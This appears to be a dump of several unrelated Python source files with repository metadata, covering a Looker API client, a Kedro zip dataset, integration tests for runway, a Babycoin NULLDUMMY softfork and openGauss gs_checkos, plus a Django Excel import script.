# Using old-style string formatting so that strings are formatted lazily
logger.debug("Retrieving the SQL for query ID %s", query_id)
url = utils.compose_url(self.api_url, path=["queries", query_id, "run", "sql"])
response = self.get(url=url, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError as e:
if e.response.status_code == 404:
return (
"-- SQL could not be generated because of errors with this query."
)
else:
raise LookerApiError(
name="unable-to-retrieve-compiled-sql",
title="Couldn't retrieve compiled SQL.",
status=response.status_code,
detail=(
f"Failed to retrieve compiled SQL for query '{query_id}'. "
"Please try again."
),
response=response,
)
result = response.text
return result
class NullAuth(requests.auth.AuthBase):
def __call__(self, r):
return r
| true
| true
|
1c40df65ea2fe64264af604bda94e41779bcdeb6
| 4,703
|
py
|
Python
|
de1/zip/zip_file_data_set.py
|
samhiscoxqb/de1-python
|
19b8fc6945cf0cd413ef79ff39a65451eea9e627
|
[
"MIT"
] | 10
|
2021-02-01T02:24:55.000Z
|
2021-11-18T13:29:06.000Z
|
de1/zip/zip_file_data_set.py
|
samhiscoxqb/de1-python
|
19b8fc6945cf0cd413ef79ff39a65451eea9e627
|
[
"MIT"
] | 2
|
2021-02-01T12:05:16.000Z
|
2021-02-05T10:05:59.000Z
|
de1/zip/zip_file_data_set.py
|
samhiscoxqb/de1-python
|
19b8fc6945cf0cd413ef79ff39a65451eea9e627
|
[
"MIT"
] | 1
|
2021-02-05T09:39:08.000Z
|
2021-02-05T09:39:08.000Z
|
import os
import tempfile
from copy import deepcopy
from typing import Any, Dict, Type, Union, Optional
from warnings import warn
from kedro.io import AbstractDataSet, DataSetError
from kedro.io.core import parse_dataset_definition, VERSION_KEY, VERSIONED_FLAG_KEY
class ZipFileDataSet(AbstractDataSet):
"""
ZipFileDataSet decompresses and extracts files from zip files.
Expects to return a single file from the unzipped dataset,
and supports multiple methods for filtering sets of files.
"""
DEFAULT_DATASET = {
"type": "text.TextDataSet",
"fs_args": {
"open_args_load": {
"mode": "rb",
}
}
}
def __init__(
self,
filepath: str,
zipped_filename: str = None,
zipped_filename_suffix: str = None,
ignored_prefixes: str = None,
ignored_suffixes: str = None,
credentials: Dict[str, str] = None,
dataset: Optional[Union[str, Type[AbstractDataSet], Dict[str, Any]]] = None,
filepath_arg: str = 'filepath',
):
if dataset is None:
dataset = ZipFileDataSet.DEFAULT_DATASET
dataset = dataset if isinstance(dataset, dict) else {"type": dataset}
self._dataset_type, self._dataset_config = parse_dataset_definition(dataset)
if VERSION_KEY in self._dataset_config:
raise DataSetError(
"`{}` does not support versioning of the underlying dataset. "
"Please remove `{}` flag from the dataset definition.".format(
self.__class__.__name__, VERSIONED_FLAG_KEY
)
)
self._filepath_arg = filepath_arg
if self._filepath_arg in self._dataset_config:
warn(
"`{}` key must not be specified in the dataset definition as it "
"will be overwritten by partition path".format(self._filepath_arg)
)
self._filepath = filepath
self._zipped_filename = zipped_filename
self._zipped_filename_suffix = zipped_filename_suffix
self._ignored_prefixes = ignored_prefixes or ['_', '.']
self._ignored_suffixes = (ignored_suffixes or []) + ['/']
credentials = credentials or {}
self._password = credentials.get('password', credentials.get('pwd'))
def _is_ignored(self, name):
for ignored_prefix in self._ignored_prefixes:
if name.startswith(ignored_prefix):
return True
for ignored_suffix in self._ignored_suffixes:
if name.endswith(ignored_suffix):
return True
return False
def _load(self) -> bytes:
import zipfile
with zipfile.ZipFile(self._filepath) as zipped:
namelist = zipped.namelist()
if self._zipped_filename_suffix is not None:
namelist = [
name for name in namelist if name.lower().endswith(self._zipped_filename_suffix)
]
namelist = [
name
for name in namelist if not self._is_ignored(name)
]
if len(namelist) > 1 and self._zipped_filename is None:
raise DataSetError(f'Multiple files found! Please specify which file to extract: {namelist}')
if len(namelist) <= 0:
raise DataSetError(f'No files found in the archive!')
target_filename = namelist[0]
if self._zipped_filename is not None:
target_filename = self._zipped_filename
with zipped.open(target_filename, pwd=self._password) as zipped_file:
temp_unzipped_dir = tempfile.mkdtemp()
temp_unzipped_filepath = os.path.join(temp_unzipped_dir, "temp_file")
with open(temp_unzipped_filepath, "wb") as temp_unzipped_file:
temp_unzipped_file.write(zipped_file.read())
kwargs = deepcopy(self._dataset_config)
kwargs[self._filepath_arg] = temp_unzipped_filepath
dataset = self._dataset_type(**kwargs)
data = dataset.load()
os.remove(temp_unzipped_filepath)
return data
def _save(self, data: Any) -> None:
raise DataSetError(f'Saving is unsupported')
def _describe(self) -> Dict[str, Any]:
return dict(
filepath=self._filepath,
zipped_filename=self._zipped_filename,
zipped_filename_suffix=self._zipped_filename_suffix,
ignored_prefixes=self._ignored_prefixes,
ignored_suffxies=self._ignored_suffixes,
)
| 38.54918
| 109
| 0.610674
|
import os
import tempfile
from copy import deepcopy
from typing import Any, Dict, Type, Union, Optional
from warnings import warn
from kedro.io import AbstractDataSet, DataSetError
from kedro.io.core import parse_dataset_definition, VERSION_KEY, VERSIONED_FLAG_KEY
class ZipFileDataSet(AbstractDataSet):
DEFAULT_DATASET = {
"type": "text.TextDataSet",
"fs_args": {
"open_args_load": {
"mode": "rb",
}
}
}
def __init__(
self,
filepath: str,
zipped_filename: str = None,
zipped_filename_suffix: str = None,
ignored_prefixes: str = None,
ignored_suffixes: str = None,
credentials: Dict[str, str] = None,
dataset: Optional[Union[str, Type[AbstractDataSet], Dict[str, Any]]] = None,
filepath_arg: str = 'filepath',
):
if dataset is None:
dataset = ZipFileDataSet.DEFAULT_DATASET
dataset = dataset if isinstance(dataset, dict) else {"type": dataset}
self._dataset_type, self._dataset_config = parse_dataset_definition(dataset)
if VERSION_KEY in self._dataset_config:
raise DataSetError(
"`{}` does not support versioning of the underlying dataset. "
"Please remove `{}` flag from the dataset definition.".format(
self.__class__.__name__, VERSIONED_FLAG_KEY
)
)
self._filepath_arg = filepath_arg
if self._filepath_arg in self._dataset_config:
warn(
"`{}` key must not be specified in the dataset definition as it "
"will be overwritten by partition path".format(self._filepath_arg)
)
self._filepath = filepath
self._zipped_filename = zipped_filename
self._zipped_filename_suffix = zipped_filename_suffix
self._ignored_prefixes = ignored_prefixes or ['_', '.']
self._ignored_suffixes = (ignored_suffixes or []) + ['/']
credentials = credentials or {}
self._password = credentials.get('password', credentials.get('pwd'))
def _is_ignored(self, name):
for ignored_prefix in self._ignored_prefixes:
if name.startswith(ignored_prefix):
return True
for ignored_suffix in self._ignored_suffixes:
if name.endswith(ignored_suffix):
return True
return False
def _load(self) -> bytes:
import zipfile
with zipfile.ZipFile(self._filepath) as zipped:
namelist = zipped.namelist()
if self._zipped_filename_suffix is not None:
namelist = [
name for name in namelist if name.lower().endswith(self._zipped_filename_suffix)
]
namelist = [
name
for name in namelist if not self._is_ignored(name)
]
if len(namelist) > 1 and self._zipped_filename is None:
raise DataSetError(f'Multiple files found! Please specify which file to extract: {namelist}')
if len(namelist) <= 0:
raise DataSetError(f'No files found in the archive!')
target_filename = namelist[0]
if self._zipped_filename is not None:
target_filename = self._zipped_filename
with zipped.open(target_filename, pwd=self._password) as zipped_file:
temp_unzipped_dir = tempfile.mkdtemp()
temp_unzipped_filepath = os.path.join(temp_unzipped_dir, "temp_file")
with open(temp_unzipped_filepath, "wb") as temp_unzipped_file:
temp_unzipped_file.write(zipped_file.read())
kwargs = deepcopy(self._dataset_config)
kwargs[self._filepath_arg] = temp_unzipped_filepath
dataset = self._dataset_type(**kwargs)
data = dataset.load()
os.remove(temp_unzipped_filepath)
return data
def _save(self, data: Any) -> None:
raise DataSetError(f'Saving is unsupported')
def _describe(self) -> Dict[str, Any]:
return dict(
filepath=self._filepath,
zipped_filename=self._zipped_filename,
zipped_filename_suffix=self._zipped_filename_suffix,
ignored_prefixes=self._ignored_prefixes,
ignored_suffxies=self._ignored_suffixes,
)
| true
| true
|
1c40dfe67753933f27df222980954730939aa54c
| 1,380
|
py
|
Python
|
test_dataset.py
|
yanzhicong/realistic-ssl-evaluation-pytorch
|
d0ea3349765f8642e97dce57cf319f703b7f1e42
|
[
"MIT"
] | null | null | null |
test_dataset.py
|
yanzhicong/realistic-ssl-evaluation-pytorch
|
d0ea3349765f8642e97dce57cf319f703b7f1e42
|
[
"MIT"
] | null | null | null |
test_dataset.py
|
yanzhicong/realistic-ssl-evaluation-pytorch
|
d0ea3349765f8642e97dce57cf319f703b7f1e42
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import numpy as np
import argparse, math, time, json, os
from lib import wrn, transform
from config import config
import vis
parser = argparse.ArgumentParser()
parser.add_argument("--dataset", "-d", default="cifar10", type=str, help="dataset name : [svhn, cifar10]")
parser.add_argument("--root", "-r", default="data", type=str, help="dataset dir")
parser.add_argument("--poison-data-ratio", default=0.0, type=float)
args = parser.parse_args()
plotter = vis.Plotter()
print("dataset : {}".format(args.dataset))
dataset_cfg = config[args.dataset]
l_train_dataset = dataset_cfg["dataset"](args.root, "l_train")
u_train_dataset = dataset_cfg["dataset"](args.root, "u_train")
images = l_train_dataset.dataset['images']
labels = l_train_dataset.dataset['labels']
print(images.shape, images.dtype, np.max(images), np.min(images))
print(labels.shape, labels.dtype, np.unique(labels), np.max(labels), np.min(labels))
for c in np.unique(labels):
print("\t{} : {}".format(c, np.sum(labels == c)))
images = u_train_dataset.dataset['images']
labels = u_train_dataset.dataset['labels']
print(images.shape, images.dtype, np.max(images), np.min(images))
print(labels.shape, labels.dtype, np.unique(labels), np.max(labels), np.min(labels))
for c in np.unique(labels):
print("\t{} : {}".format(c, np.sum(labels == c)))
| 25.555556
| 106
| 0.703623
|
import numpy as np
import argparse, math, time, json, os
from lib import wrn, transform
from config import config
import vis
parser = argparse.ArgumentParser()
parser.add_argument("--dataset", "-d", default="cifar10", type=str, help="dataset name : [svhn, cifar10]")
parser.add_argument("--root", "-r", default="data", type=str, help="dataset dir")
parser.add_argument("--poison-data-ratio", default=0.0, type=float)
args = parser.parse_args()
plotter = vis.Plotter()
print("dataset : {}".format(args.dataset))
dataset_cfg = config[args.dataset]
l_train_dataset = dataset_cfg["dataset"](args.root, "l_train")
u_train_dataset = dataset_cfg["dataset"](args.root, "u_train")
images = l_train_dataset.dataset['images']
labels = l_train_dataset.dataset['labels']
print(images.shape, images.dtype, np.max(images), np.min(images))
print(labels.shape, labels.dtype, np.unique(labels), np.max(labels), np.min(labels))
for c in np.unique(labels):
print("\t{} : {}".format(c, np.sum(labels == c)))
images = u_train_dataset.dataset['images']
labels = u_train_dataset.dataset['labels']
print(images.shape, images.dtype, np.max(images), np.min(images))
print(labels.shape, labels.dtype, np.unique(labels), np.max(labels), np.min(labels))
for c in np.unique(labels):
print("\t{} : {}".format(c, np.sum(labels == c)))
| true
| true
|
1c40dfec119082283f869d943aa79be46c787106
| 1,233
|
py
|
Python
|
integration_tests/test_commands/tests/test_stacker.py
|
troyready/runway
|
4fd299961a4b73df39e14f4f19a7236f7be17dd8
|
[
"Apache-2.0"
] | null | null | null |
integration_tests/test_commands/tests/test_stacker.py
|
troyready/runway
|
4fd299961a4b73df39e14f4f19a7236f7be17dd8
|
[
"Apache-2.0"
] | null | null | null |
integration_tests/test_commands/tests/test_stacker.py
|
troyready/runway
|
4fd299961a4b73df39e14f4f19a7236f7be17dd8
|
[
"Apache-2.0"
] | null | null | null |
"""Test deploying stacker."""
# pylint: disable=no-self-use
import os
from subprocess import check_output
import boto3
from integration_tests.test_commands.test_commands import Commands
KEY = "/runway/integration-test/stacker"
VALUE = "foo"
class TestRunStacker(Commands):
"""Tests run-stacker subcommand."""
TEST_NAME = __name__
def get_stack_path(self):
"""Get the stacker test path."""
return os.path.join(
os.path.dirname(os.path.dirname(__file__)), "fixtures", "stacker"
)
def init(self):
"""Initialize test."""
def run(self):
"""Run tests."""
path = self.get_stack_path()
check_output(
["runway", "run-stacker", "--", "build", "stack.yaml"], cwd=path
).decode()
client = boto3.client("ssm", region_name=self.environment["AWS_DEFAULT_REGION"])
parameter = client.get_parameter(Name=KEY)
assert parameter["Parameter"]["Value"] == VALUE
def teardown(self):
"""Teardown any created resources."""
path = self.get_stack_path()
check_output(
["runway", "run-stacker", "--", "destroy", "stack.yaml", "--force"],
cwd=path,
).decode()
| 27.4
| 88
| 0.60665
|
import os
from subprocess import check_output
import boto3
from integration_tests.test_commands.test_commands import Commands
KEY = "/runway/integration-test/stacker"
VALUE = "foo"
class TestRunStacker(Commands):
TEST_NAME = __name__
def get_stack_path(self):
return os.path.join(
os.path.dirname(os.path.dirname(__file__)), "fixtures", "stacker"
)
def init(self):
def run(self):
path = self.get_stack_path()
check_output(
["runway", "run-stacker", "--", "build", "stack.yaml"], cwd=path
).decode()
client = boto3.client("ssm", region_name=self.environment["AWS_DEFAULT_REGION"])
parameter = client.get_parameter(Name=KEY)
assert parameter["Parameter"]["Value"] == VALUE
def teardown(self):
path = self.get_stack_path()
check_output(
["runway", "run-stacker", "--", "destroy", "stack.yaml", "--force"],
cwd=path,
).decode()
| true
| true
|
1c40e0c8d7f2d926101325d5f768f04f96b4f6f0
| 6,474
|
py
|
Python
|
test/functional/nulldummy.py
|
hendry19901990/babycoin
|
c973192d7e877249b0c58127f10ea95083309993
|
[
"MIT"
] | null | null | null |
test/functional/nulldummy.py
|
hendry19901990/babycoin
|
c973192d7e877249b0c58127f10ea95083309993
|
[
"MIT"
] | null | null | null |
test/functional/nulldummy.py
|
hendry19901990/babycoin
|
c973192d7e877249b0c58127f10ea95083309993
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2016 The Babycoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test NULLDUMMY softfork.
Connect to a single node.
Generate 2 blocks (save the coinbases for later).
Generate 427 more blocks.
[Policy/Consensus] Check that NULLDUMMY compliant transactions are accepted in the 430th block.
[Policy] Check that non-NULLDUMMY transactions are rejected before activation.
[Consensus] Check that the new NULLDUMMY rules are not enforced on the 431st block.
[Policy/Consensus] Check that the new NULLDUMMY rules are enforced on the 432nd block.
"""
from test_framework.test_framework import BabycoinTestFramework
from test_framework.util import *
from test_framework.mininode import CTransaction, NetworkThread
from test_framework.blocktools import create_coinbase, create_block, add_witness_commitment
from test_framework.script import CScript
from io import BytesIO
import time
NULLDUMMY_ERROR = "64: non-mandatory-script-verify-flag (Dummy CHECKMULTISIG argument must be zero)"
def trueDummy(tx):
scriptSig = CScript(tx.vin[0].scriptSig)
newscript = []
for i in scriptSig:
if (len(newscript) == 0):
assert(len(i) == 0)
newscript.append(b'\x51')
else:
newscript.append(i)
tx.vin[0].scriptSig = CScript(newscript)
tx.rehash()
class NULLDUMMYTest(BabycoinTestFramework):
def set_test_params(self):
self.num_nodes = 1
self.setup_clean_chain = True
self.extra_args = [['-whitelist=127.0.0.1', '-walletprematurewitness']]
def run_test(self):
self.address = self.nodes[0].getnewaddress()
self.ms_address = self.nodes[0].addmultisigaddress(1,[self.address])
self.wit_address = self.nodes[0].addwitnessaddress(self.address)
self.wit_ms_address = self.nodes[0].addwitnessaddress(self.ms_address)
NetworkThread().start() # Start up network handling in another thread
self.coinbase_blocks = self.nodes[0].generate(2) # Block 2
coinbase_txid = []
for i in self.coinbase_blocks:
coinbase_txid.append(self.nodes[0].getblock(i)['tx'][0])
self.nodes[0].generate(427) # Block 429
self.lastblockhash = self.nodes[0].getbestblockhash()
self.tip = int("0x" + self.lastblockhash, 0)
self.lastblockheight = 429
self.lastblocktime = int(time.time()) + 429
self.log.info("Test 1: NULLDUMMY compliant base transactions should be accepted to mempool and mined before activation [430]")
test1txs = [self.create_transaction(self.nodes[0], coinbase_txid[0], self.ms_address, 49)]
txid1 = self.nodes[0].sendrawtransaction(bytes_to_hex_str(test1txs[0].serialize_with_witness()), True)
test1txs.append(self.create_transaction(self.nodes[0], txid1, self.ms_address, 48))
txid2 = self.nodes[0].sendrawtransaction(bytes_to_hex_str(test1txs[1].serialize_with_witness()), True)
test1txs.append(self.create_transaction(self.nodes[0], coinbase_txid[1], self.wit_ms_address, 49))
txid3 = self.nodes[0].sendrawtransaction(bytes_to_hex_str(test1txs[2].serialize_with_witness()), True)
self.block_submit(self.nodes[0], test1txs, False, True)
self.log.info("Test 2: Non-NULLDUMMY base multisig transaction should not be accepted to mempool before activation")
test2tx = self.create_transaction(self.nodes[0], txid2, self.ms_address, 47)
trueDummy(test2tx)
assert_raises_rpc_error(-26, NULLDUMMY_ERROR, self.nodes[0].sendrawtransaction, bytes_to_hex_str(test2tx.serialize_with_witness()), True)
self.log.info("Test 3: Non-NULLDUMMY base transactions should be accepted in a block before activation [431]")
self.block_submit(self.nodes[0], [test2tx], False, True)
self.log.info("Test 4: Non-NULLDUMMY base multisig transaction is invalid after activation")
test4tx = self.create_transaction(self.nodes[0], test2tx.hash, self.address, 46)
test6txs=[CTransaction(test4tx)]
trueDummy(test4tx)
assert_raises_rpc_error(-26, NULLDUMMY_ERROR, self.nodes[0].sendrawtransaction, bytes_to_hex_str(test4tx.serialize_with_witness()), True)
self.block_submit(self.nodes[0], [test4tx])
self.log.info("Test 5: Non-NULLDUMMY P2WSH multisig transaction invalid after activation")
test5tx = self.create_transaction(self.nodes[0], txid3, self.wit_address, 48)
test6txs.append(CTransaction(test5tx))
test5tx.wit.vtxinwit[0].scriptWitness.stack[0] = b'\x01'
assert_raises_rpc_error(-26, NULLDUMMY_ERROR, self.nodes[0].sendrawtransaction, bytes_to_hex_str(test5tx.serialize_with_witness()), True)
self.block_submit(self.nodes[0], [test5tx], True)
self.log.info("Test 6: NULLDUMMY compliant base/witness transactions should be accepted to mempool and in block after activation [432]")
for i in test6txs:
self.nodes[0].sendrawtransaction(bytes_to_hex_str(i.serialize_with_witness()), True)
self.block_submit(self.nodes[0], test6txs, True, True)
def create_transaction(self, node, txid, to_address, amount):
inputs = [{ "txid" : txid, "vout" : 0}]
outputs = { to_address : amount }
rawtx = node.createrawtransaction(inputs, outputs)
signresult = node.signrawtransaction(rawtx)
tx = CTransaction()
f = BytesIO(hex_str_to_bytes(signresult['hex']))
tx.deserialize(f)
return tx
def block_submit(self, node, txs, witness = False, accept = False):
block = create_block(self.tip, create_coinbase(self.lastblockheight + 1), self.lastblocktime + 1)
block.nVersion = 4
for tx in txs:
tx.rehash()
block.vtx.append(tx)
block.hashMerkleRoot = block.calc_merkle_root()
witness and add_witness_commitment(block)
block.rehash()
block.solve()
node.submitblock(bytes_to_hex_str(block.serialize(True)))
if (accept):
assert_equal(node.getbestblockhash(), block.hash)
self.tip = block.sha256
self.lastblockhash = block.hash
self.lastblocktime += 1
self.lastblockheight += 1
else:
assert_equal(node.getbestblockhash(), self.lastblockhash)
if __name__ == '__main__':
NULLDUMMYTest().main()
| 49.045455
| 145
| 0.701267
|
from test_framework.test_framework import BabycoinTestFramework
from test_framework.util import *
from test_framework.mininode import CTransaction, NetworkThread
from test_framework.blocktools import create_coinbase, create_block, add_witness_commitment
from test_framework.script import CScript
from io import BytesIO
import time
NULLDUMMY_ERROR = "64: non-mandatory-script-verify-flag (Dummy CHECKMULTISIG argument must be zero)"
def trueDummy(tx):
scriptSig = CScript(tx.vin[0].scriptSig)
newscript = []
for i in scriptSig:
if (len(newscript) == 0):
assert(len(i) == 0)
newscript.append(b'\x51')
else:
newscript.append(i)
tx.vin[0].scriptSig = CScript(newscript)
tx.rehash()
class NULLDUMMYTest(BabycoinTestFramework):
def set_test_params(self):
self.num_nodes = 1
self.setup_clean_chain = True
self.extra_args = [['-whitelist=127.0.0.1', '-walletprematurewitness']]
def run_test(self):
self.address = self.nodes[0].getnewaddress()
self.ms_address = self.nodes[0].addmultisigaddress(1,[self.address])
self.wit_address = self.nodes[0].addwitnessaddress(self.address)
self.wit_ms_address = self.nodes[0].addwitnessaddress(self.ms_address)
NetworkThread().start()
self.coinbase_blocks = self.nodes[0].generate(2)
coinbase_txid = []
for i in self.coinbase_blocks:
coinbase_txid.append(self.nodes[0].getblock(i)['tx'][0])
self.nodes[0].generate(427)
self.lastblockhash = self.nodes[0].getbestblockhash()
self.tip = int("0x" + self.lastblockhash, 0)
self.lastblockheight = 429
self.lastblocktime = int(time.time()) + 429
self.log.info("Test 1: NULLDUMMY compliant base transactions should be accepted to mempool and mined before activation [430]")
test1txs = [self.create_transaction(self.nodes[0], coinbase_txid[0], self.ms_address, 49)]
txid1 = self.nodes[0].sendrawtransaction(bytes_to_hex_str(test1txs[0].serialize_with_witness()), True)
test1txs.append(self.create_transaction(self.nodes[0], txid1, self.ms_address, 48))
txid2 = self.nodes[0].sendrawtransaction(bytes_to_hex_str(test1txs[1].serialize_with_witness()), True)
test1txs.append(self.create_transaction(self.nodes[0], coinbase_txid[1], self.wit_ms_address, 49))
txid3 = self.nodes[0].sendrawtransaction(bytes_to_hex_str(test1txs[2].serialize_with_witness()), True)
self.block_submit(self.nodes[0], test1txs, False, True)
self.log.info("Test 2: Non-NULLDUMMY base multisig transaction should not be accepted to mempool before activation")
test2tx = self.create_transaction(self.nodes[0], txid2, self.ms_address, 47)
trueDummy(test2tx)
assert_raises_rpc_error(-26, NULLDUMMY_ERROR, self.nodes[0].sendrawtransaction, bytes_to_hex_str(test2tx.serialize_with_witness()), True)
self.log.info("Test 3: Non-NULLDUMMY base transactions should be accepted in a block before activation [431]")
self.block_submit(self.nodes[0], [test2tx], False, True)
self.log.info("Test 4: Non-NULLDUMMY base multisig transaction is invalid after activation")
test4tx = self.create_transaction(self.nodes[0], test2tx.hash, self.address, 46)
test6txs=[CTransaction(test4tx)]
trueDummy(test4tx)
assert_raises_rpc_error(-26, NULLDUMMY_ERROR, self.nodes[0].sendrawtransaction, bytes_to_hex_str(test4tx.serialize_with_witness()), True)
self.block_submit(self.nodes[0], [test4tx])
self.log.info("Test 5: Non-NULLDUMMY P2WSH multisig transaction invalid after activation")
test5tx = self.create_transaction(self.nodes[0], txid3, self.wit_address, 48)
test6txs.append(CTransaction(test5tx))
test5tx.wit.vtxinwit[0].scriptWitness.stack[0] = b'\x01'
assert_raises_rpc_error(-26, NULLDUMMY_ERROR, self.nodes[0].sendrawtransaction, bytes_to_hex_str(test5tx.serialize_with_witness()), True)
self.block_submit(self.nodes[0], [test5tx], True)
self.log.info("Test 6: NULLDUMMY compliant base/witness transactions should be accepted to mempool and in block after activation [432]")
for i in test6txs:
self.nodes[0].sendrawtransaction(bytes_to_hex_str(i.serialize_with_witness()), True)
self.block_submit(self.nodes[0], test6txs, True, True)
def create_transaction(self, node, txid, to_address, amount):
inputs = [{ "txid" : txid, "vout" : 0}]
outputs = { to_address : amount }
rawtx = node.createrawtransaction(inputs, outputs)
signresult = node.signrawtransaction(rawtx)
tx = CTransaction()
f = BytesIO(hex_str_to_bytes(signresult['hex']))
tx.deserialize(f)
return tx
def block_submit(self, node, txs, witness = False, accept = False):
block = create_block(self.tip, create_coinbase(self.lastblockheight + 1), self.lastblocktime + 1)
block.nVersion = 4
for tx in txs:
tx.rehash()
block.vtx.append(tx)
block.hashMerkleRoot = block.calc_merkle_root()
witness and add_witness_commitment(block)
block.rehash()
block.solve()
node.submitblock(bytes_to_hex_str(block.serialize(True)))
if (accept):
assert_equal(node.getbestblockhash(), block.hash)
self.tip = block.sha256
self.lastblockhash = block.hash
self.lastblocktime += 1
self.lastblockheight += 1
else:
assert_equal(node.getbestblockhash(), self.lastblockhash)
if __name__ == '__main__':
NULLDUMMYTest().main()
| true
| true
|
1c40e0fff52728bd0af1f0cfdd008ddd639c57ea
| 2,255
|
py
|
Python
|
openGaussBase/testcase/TOOLS/SERVER_TOOLS/gs_checkos/Opengauss_Function_Tools_gs_checkos_Case0006.py
|
opengauss-mirror/Yat
|
aef107a8304b94e5d99b4f1f36eb46755eb8919e
|
[
"MulanPSL-1.0"
] | null | null | null |
openGaussBase/testcase/TOOLS/SERVER_TOOLS/gs_checkos/Opengauss_Function_Tools_gs_checkos_Case0006.py
|
opengauss-mirror/Yat
|
aef107a8304b94e5d99b4f1f36eb46755eb8919e
|
[
"MulanPSL-1.0"
] | null | null | null |
openGaussBase/testcase/TOOLS/SERVER_TOOLS/gs_checkos/Opengauss_Function_Tools_gs_checkos_Case0006.py
|
opengauss-mirror/Yat
|
aef107a8304b94e5d99b4f1f36eb46755eb8919e
|
[
"MulanPSL-1.0"
] | null | null | null |
"""
Copyright (c) 2022 Huawei Technologies Co.,Ltd.
openGauss is licensed under Mulan PSL v2.
You can use this software according to the terms and conditions of the Mulan PSL v2.
You may obtain a copy of Mulan PSL v2 at:
http://license.coscl.org.cn/MulanPSL2
THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND,
EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT,
MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE.
See the Mulan PSL v2 for more details.
"""
"""
Case Type : 服务端工具
Case Name : 设置会话流程
Description :
设置会话流程
Expect :
设置成功
History :
"""
import unittest
from yat.test import Node
from yat.test import macro
from testcase.utils.Constant import Constant
from testcase.utils.Logger import Logger
logger = Logger()
class Tools(unittest.TestCase):
def setUp(self):
logger.info('--------------Opengauss_Function_Tools_gs_checkos_Case0006start-------------------')
self.rootNode = Node('default')
self.Constant = Constant()
def test_server_tools(self):
logger.info('------------------root用户设置会话流程------------------')
checkos_cmd = f'''
source {macro.DB_ENV_PATH}
gs_checkos -i B8
'''
logger.info(checkos_cmd)
msg = self.rootNode.sh(checkos_cmd).result()
logger.info(msg)
logger.info('--------------解析执行结果---------------')
str_1 = msg.split('\n')
logger.info(str_1)
if len(str_1) > 2:
str_list = str_1[1].split(':')
logger.info(str_list)
logger.info('--------------校验结果---------------')
self.assertEqual(len(str_list), 2, '结果验证失败1')
self.assertEqual(str_list[0].strip(), 'B8. [ Set Session Process ]', '结果验证失败3')
logger.info(str_list[0].strip())
i = str_list[1].strip()
self.assertTrue(i in ['Normal', 'Warning'], f'状态验证失败,当前状态:{i}')
else:
raise Exception("解析结果异常")
def tearDown(self):
logger.info('--------------无需清理环境-------------------')
logger.info('------------------Opengauss_Function_Tools_gs_checkos_Case0006finish------------------')
| 34.166667
| 109
| 0.572062
|
import unittest
from yat.test import Node
from yat.test import macro
from testcase.utils.Constant import Constant
from testcase.utils.Logger import Logger
logger = Logger()
class Tools(unittest.TestCase):
def setUp(self):
logger.info('--------------Opengauss_Function_Tools_gs_checkos_Case0006start-------------------')
self.rootNode = Node('default')
self.Constant = Constant()
def test_server_tools(self):
logger.info('------------------root用户设置会话流程------------------')
checkos_cmd = f'''
source {macro.DB_ENV_PATH}
gs_checkos -i B8
'''
logger.info(checkos_cmd)
msg = self.rootNode.sh(checkos_cmd).result()
logger.info(msg)
logger.info('--------------解析执行结果---------------')
str_1 = msg.split('\n')
logger.info(str_1)
if len(str_1) > 2:
str_list = str_1[1].split(':')
logger.info(str_list)
logger.info('--------------校验结果---------------')
self.assertEqual(len(str_list), 2, '结果验证失败1')
self.assertEqual(str_list[0].strip(), 'B8. [ Set Session Process ]', '结果验证失败3')
logger.info(str_list[0].strip())
i = str_list[1].strip()
self.assertTrue(i in ['Normal', 'Warning'], f'状态验证失败,当前状态:{i}')
else:
raise Exception("解析结果异常")
def tearDown(self):
logger.info('--------------无需清理环境-------------------')
logger.info('------------------Opengauss_Function_Tools_gs_checkos_Case0006finish------------------')
| true
| true
|
1c40e117ad75d54eeb6b012db34f68dbff01bc78
| 1,734
|
py
|
Python
|
tool_box/conf_auto_fill/pre_field_info_add.py
|
diudiu/featurefactory
|
ee02ad9e3ea66e2eeafe6e11859801f0420c7d9e
|
[
"MIT"
] | null | null | null |
tool_box/conf_auto_fill/pre_field_info_add.py
|
diudiu/featurefactory
|
ee02ad9e3ea66e2eeafe6e11859801f0420c7d9e
|
[
"MIT"
] | null | null | null |
tool_box/conf_auto_fill/pre_field_info_add.py
|
diudiu/featurefactory
|
ee02ad9e3ea66e2eeafe6e11859801f0420c7d9e
|
[
"MIT"
] | null | null | null |
# -*- coding:utf-8 -*-
"""
License SYPH-L.
Copyright (c) 2013- SYPH(Shaohan Niu), All Rights Reserved.
-----------------------------------------------------------
Author: S.JunPeng
Date: 2016/12/26
Change Activity:
"""
import os
import sys
import xlrd
home_path = os.path.dirname(os.path.dirname(os.path.dirname(__file__)))
sys.path.append(home_path)
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'featurefactory.settings')
import django
django.setup()
from apps.etl.models import PreFieldInfo
def load_field_info_from_xls(file_path):
field_info_conf_list = []
xls = xlrd.open_workbook(file_path)
sheet1 = xls.sheets()[0]
for row_num in range(sheet1.nrows):
if row_num == 0:
continue
row = sheet1.row_values(row_num)
feature_conf = {
'id': int(row[0]),
'field_name': row[1],
'field_name_cn': row[2],
'source': row[3],
'path': row[4],
}
field_info_conf_list.append(feature_conf)
return field_info_conf_list
def init_feature_field():
all_feature_conf = load_field_info_from_xls('pre_field_info.xlsx')
for feature_conf in all_feature_conf:
if PreFieldInfo.objects.filter(
field_name=feature_conf['field_name'],
).count() > 0:
continue
else:
pfi = PreFieldInfo(
id=feature_conf['id'],
field_name=feature_conf['field_name'],
field_name_cn=feature_conf['field_name_cn'],
source=feature_conf['source'],
path=feature_conf['path'],
)
pfi.save()
if __name__ == '__main__':
init_feature_field()
| 26.676923
| 74
| 0.586505
|
import os
import sys
import xlrd
home_path = os.path.dirname(os.path.dirname(os.path.dirname(__file__)))
sys.path.append(home_path)
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'featurefactory.settings')
import django
django.setup()
from apps.etl.models import PreFieldInfo
def load_field_info_from_xls(file_path):
field_info_conf_list = []
xls = xlrd.open_workbook(file_path)
sheet1 = xls.sheets()[0]
for row_num in range(sheet1.nrows):
if row_num == 0:
continue
row = sheet1.row_values(row_num)
feature_conf = {
